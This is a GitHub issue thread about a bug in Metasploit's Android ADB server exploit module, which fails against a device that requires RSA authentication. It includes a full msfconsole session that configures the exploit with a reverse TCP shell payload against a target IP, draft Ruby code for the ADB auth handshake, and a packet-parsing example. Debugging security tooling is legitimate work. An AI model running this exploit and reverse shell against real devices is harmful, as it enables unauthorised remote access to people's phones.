Commit : d6facbe3393ac4a5c9ffc95ffbf75d69c31f4b2e
Pull : #6421
While using recent exploit/android/adb/adb_server_exec.rb my msfconsole reads garbage data and stops working further.
root@kali:~# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.7-- ]
+ -- --=[ 1519 exploits - 877 auxiliary - 259 post ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/android/adb/adb_server_exec
msf exploit(adb_server_exec) > show options
Module options (exploit/android/adb/adb_server_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 5555 yes The target port
WritableDir /data/local/tmp/ yes Writable directory
Payload options (linux/armle/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARGV0 sh no argv[0] to pass to execve
LHOST yes The listen address
LPORT 4444 yes The listen port
SHELL /system/bin/sh yes The shell to execute.
Exploit target:
Id Name
-- ----
0 armle
msf exploit(adb_server_exec) > set payload linux/armle/shell_reverse_tcp
payload => linux/armle/shell_reverse_tcp
msf exploit(adb_server_exec) > adb devices
[-] Unknown command: adb.
msf exploit(adb_server_exec) > show targets
Exploit targets:
Id Name
-- ----
0 armle
1 x86
2 x64
3 mipsle
msf exploit(adb_server_exec) > set TARGET 0
TARGET => 0
msf exploit(adb_server_exec) > show options
Module options (exploit/android/adb/adb_server_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 5555 yes The target port
WritableDir /data/local/tmp/ yes Writable directory
Payload options (linux/armle/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARGV0 sh no argv[0] to pass to execve
LHOST yes The listen address
LPORT 4444 yes The listen port
SHELL /system/bin/sh yes The shell to execute.
Exploit target:
Id Name
-- ----
0 armle
msf exploit(adb_server_exec) > set RHOST 192.168.1.116
RHOST => 192.168.1.116
msf exploit(adb_server_exec) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(adb_server_exec) > exploit
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] Connecting to device...
[+] Connected to device:
���E��'�˷l{s�
�'
^C[*] Exploit completed, but no session was created.
msf exploit(adb_server_exec) > Interrupt: use the 'exit' command to quit
msf exploit(adb_server_exec) > exploit
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] Connecting to device...
[+] Connected to device:
����Q��gzҝ`j�sޡ�
After the rubbish data, I can't do any further attack as it gets stuck there.
I am using Kali Linux Rolling 2016.1
Android Device: Moto G (2nd Gen) X1550
Android 5.1.1
Any help would be appreciated
Did you try reset?
If you change the line modules/exploits/android/adb/adb_server_exec.rb:56 to:
print_good "Connected to device:\n#{device_data.inspect} #{device_data.to_s}"
It should print out some more enlightening data about the received packet.
@waffleio-r7 Thanks but that doesn't work
@joevennix I have made the suggested changes and this is what I get now,
msf exploit(adb_server_exec) > exploit
[*] Started reverse TCP handler on 192.168.1.4:433
[*] Connecting to device...
[+] Connected to device:
#<Rex::Proto::ADB::Message::Auth:0x00000005a1a540 @command="AUTH", @arg0=1, @arg1=0, @data="\xA8w (\x1F\x14\x05r\xB8\x0E\xD7(I\x0E)\x7F\x94\x87\xC5]"> command=AUTH
arg0=0x1
arg1=0x0
data=�w (r��(I)���]
Any Ideas?
Edit:
Just a side question, will this require end user confirmation to allow me to connect?
@Ashesh3, thanks for the info, this is very helpful. Looks like there is an RSA-based authentication protocol that I never ran into when testing locally. Whoops. It looks very easy to implement, so I'll poke around at a device and try to finish it.
From the sound of it, if auth is enabled then unless you possess an already-accepted RSA key, the user must confirm the new connection.
@joevennix Thanks for the information. I'll keep an eye out!
Any updates?
To fix it requires implementing the authentication protocol that your device likely is requesting. I'll update the title to reflect that.
@Ashesh3 can you explain a bit more on how you set up the device? What steps did you take to enable remote debugging?
@joevennix As per my experience, most of the latest devices won't have a wifi adb option in developer tools by default.
This problem can be solved by using third party apps which enable this functionality, with or without having root privileges.
Basically I installed a third party app from Play store named "Adb WiFi" and got the initial result as mentioned by me earlier; the result is the same with different apps and different devices.
I currently don't own a developer Android release, just stock ROM, and in real world circumstances an attacker would rarely like to attack a victim using a developer kernel.
@Ashesh3 networked ADB seems to be more common on android TV devices, that is what I tested on. Unfortunately I don't have a spare 5.0 device that I want to install apps on. From the protocol readme, something like this should work (replace the existing connect method in lib/rex/proto/adb/client.rb):
def connect
  # Send CNXN and read the device's reply
  response = ADB::Message::Connect.new.send_recv(@sock)
  if response.is_a? ADB::Message::Auth
    # The device requires RSA auth: response.data is its 20-byte challenge token.
    # A freshly generated key is not on the device's accepted-key list, so the
    # device answers with another AUTH token packet instead of CNXN.
    # Note: adbd verifies with RSA_verify(NID_sha1, token, ...), i.e. it treats
    # the token itself as the SHA-1 digest; PKey#sign hashes the data first, so
    # the raw token must be signed without re-hashing for a registered key to validate.
    key = OpenSSL::PKey::RSA.new 2048
    signature = key.sign(OpenSSL::Digest::SHA1.new, response.data)
    sig_packet = ADB::Message::Auth.new(ADB::Message::Auth::TYPE_SIGNATURE, signature)
    sig_packet.send_recv(@sock)
  else
    response
  end
end
If the key fails you will get back the garbage Auth packet again.
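To make the "garbage" after "Connected to device:" readable, here is an added example (not code from metasploit-framework or from anyone in this thread) that packs and parses raw ADB wire messages and labels AUTH packets by their arg0 type; the sample packet is constructed around the 20-byte token shown earlier in the thread, and the adb_pack/adb_parse/describe_auth names are the example's own.

```ruby
# ADB wire message: six little-endian uint32s (command, arg0, arg1,
# data_length, data_check, magic) followed by data_length payload bytes.
ADB_AUTH = 0x48545541 # "AUTH" packed little-endian
AUTH_TYPES = { 1 => 'TOKEN', 2 => 'SIGNATURE', 3 => 'RSAPUBLICKEY' }.freeze

# Builds a raw ADB message (used here only to construct sample input).
def adb_pack(command, arg0, arg1, data)
  data = data.b
  check = data.bytes.sum & 0xffffffff
  [command, arg0, arg1, data.bytesize, check, command ^ 0xffffffff].pack('V6') + data
end

# Parses one message; raises on a short header, bad magic, truncation or checksum mismatch.
def adb_parse(raw)
  raw = raw.b
  raise 'short header' if raw.bytesize < 24
  cmd, arg0, arg1, len, check, magic = raw[0, 24].unpack('V6')
  raise 'bad magic' unless magic == (cmd ^ 0xffffffff)
  data = raw[24, len]
  raise 'truncated data' if data.nil? || data.bytesize != len
  raise 'bad checksum' unless (data.bytes.sum & 0xffffffff) == check
  { command: [cmd].pack('V'), arg0: arg0, arg1: arg1, data: data }
end

# Describes an AUTH message in words; returns nil for any other command.
def describe_auth(msg)
  return nil unless msg[:command] == 'AUTH'
  type = AUTH_TYPES.fetch(msg[:arg0], "UNKNOWN(#{msg[:arg0]})")
  "AUTH #{type}: #{msg[:data].bytesize} bytes #{msg[:data].unpack1('H*')}"
end

# Constructed sample: AUTH arg0=1 (TOKEN) carrying the token the device sent above.
SAMPLE_TOKEN = "\xA8w (\x1F\x14\x05r\xB8\x0E\xD7(I\x0E)\x7F\x94\x87\xC5]".b
SAMPLE_PACKET = adb_pack(ADB_AUTH, 1, 0, SAMPLE_TOKEN)

if __FILE__ == $0
  puts describe_auth(adb_parse(SAMPLE_PACKET))
end
```

A TOKEN packet in reply to CNXN means the device is challenging the host, so no session can be created until a key it has already accepted signs that token.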
Any Update??
@GabrielTK casts thread necromancy! It has an immediate effect!
@GabrielTK: Oops, we forgot to implement this. I can take a look soon-ish. Happy New Year!
Thanks. Happy New Year for you too!
I'm trying to implement the same thing but it gets stuck right there too. Any update on how to solve it?